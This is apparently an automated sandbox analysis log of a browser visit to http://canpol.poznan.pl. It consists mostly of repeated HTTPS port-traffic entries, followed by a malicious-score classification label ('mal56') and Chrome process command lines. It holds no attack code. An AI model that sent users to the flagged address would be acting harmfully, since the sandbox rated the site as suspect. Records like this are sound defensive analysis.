Source: unknownNetwork traffic detected: HTTP traffic on port 49244 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 49187 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49222 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49278 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
Source: unknownNetwork traffic detected: HTTP traffic on port 49211 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
Source: unknownNetwork traffic detected: HTTP traffic on port 49290 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
Source: unknownNetwork traffic detected: HTTP traffic on port 49269 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
Source: unknownNetwork traffic detected: HTTP traffic on port 49200 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49246 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49223 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49198 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49234 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49197 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49212 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
Source: unknownNetwork traffic detected: HTTP traffic on port 49235 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 49268 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 49291 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 49186 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49201 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49280 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49227
Source: unknownNetwork traffic detected: HTTP traffic on port 49185 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49226
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49225
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49224
Source: unknownNetwork traffic detected: HTTP traffic on port 49265 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49223
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49222
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49221
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49220
Source: unknownNetwork traffic detected: HTTP traffic on port 49242 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49207 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49219
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49218
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49217
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49216
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49215
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49214
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49213
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49212
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49211
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49210
Source: unknownNetwork traffic detected: HTTP traffic on port 49276 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49209
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49208
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49207
Source: unknownNetwork traffic detected: HTTP traffic on port 49230 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49206
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49205
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49204
Source: unknownNetwork traffic detected: HTTP traffic on port 49219 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49203
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49202
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49201
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49200
Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49231 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49289 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
Source: unknownNetwork traffic detected: HTTP traffic on port 49264 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49208 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49253 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49269
Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49268
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49267
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49266
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49265
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49264
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49263
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49262
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49261
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49260
Source: unknownNetwork traffic detected: HTTP traffic on port 49195 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49298 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49184 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49220 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49259
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49258
Source: unknownNetwork traffic detected: HTTP traffic on port 49266 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49255
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49254
Source: unknownNetwork traffic detected: HTTP traffic on port 49287 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49253
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49252
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49251
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49250
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49255 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49249
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49248
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49247
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49246
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49244
Source: unknownNetwork traffic detected: HTTP traffic on port 49183 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49243
Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49242
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49241
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49240
Source: unknownNetwork traffic detected: HTTP traffic on port 49209 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49221 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49254 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49277 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49239
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49238
Source: unknownNetwork traffic detected: HTTP traffic on port 49243 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49237
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49236
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49235
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49234
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49233
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49232
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49231
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49230
Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49229
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49228
Source: unknownNetwork traffic detected: HTTP traffic on port 49232 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49189
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49188
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49187
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49186
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49185
Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49184
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49183
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49182
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49181
Source: unknownNetwork traffic detected: HTTP traffic on port 49204 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49227 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49180
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49179
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49178
Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49298
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49296
Source: unknownNetwork traffic detected: HTTP traffic on port 49262 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49295
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49294
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49293
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49292
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49291
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49290
Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49238 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49251 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49289
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49287
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49286
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49285
Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49284
Source: unknownNetwork traffic detected: HTTP traffic on port 49286 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49283
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49280
Source: unknownNetwork traffic detected: HTTP traffic on port 49193 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49239 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49273 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49216 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49250 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49279
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49278
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49277
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49276
Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49182 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49275
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49274
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49273
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49272
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49271
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49270
Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49205 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49181 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49284 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49275 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49252 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49228 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49241 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49217 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49296 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49263 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49240 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49206 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49218 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49199
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49198
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49197
Source: unknownNetwork traffic detected: HTTP traffic on port 49285 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49195
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49193
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49191
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49190
Source: unknownNetwork traffic detected: HTTP traffic on port 49229 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49274 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49294 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49191 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49271 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49180 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49224 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49213 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49259 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49202 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49225 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49258 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49295 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49247 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49236 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49179 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49270 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49261 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49189 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
Source: unknownNetwork traffic detected: HTTP traffic on port 49237 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
Source: unknownNetwork traffic detected: HTTP traffic on port 49214 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
Source: unknownNetwork traffic detected: HTTP traffic on port 49293 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49190 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49249 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49203 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
Source: unknownNetwork traffic detected: HTTP traffic on port 49272 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49248 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49283 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49178 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49226 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49260 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49215 -> 443
Source: classification engineClassification label: mal56.win@20/354@10/5
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=1968,i,9372517278438592400,14477646121863632151,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://canpol.poznan.pl"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
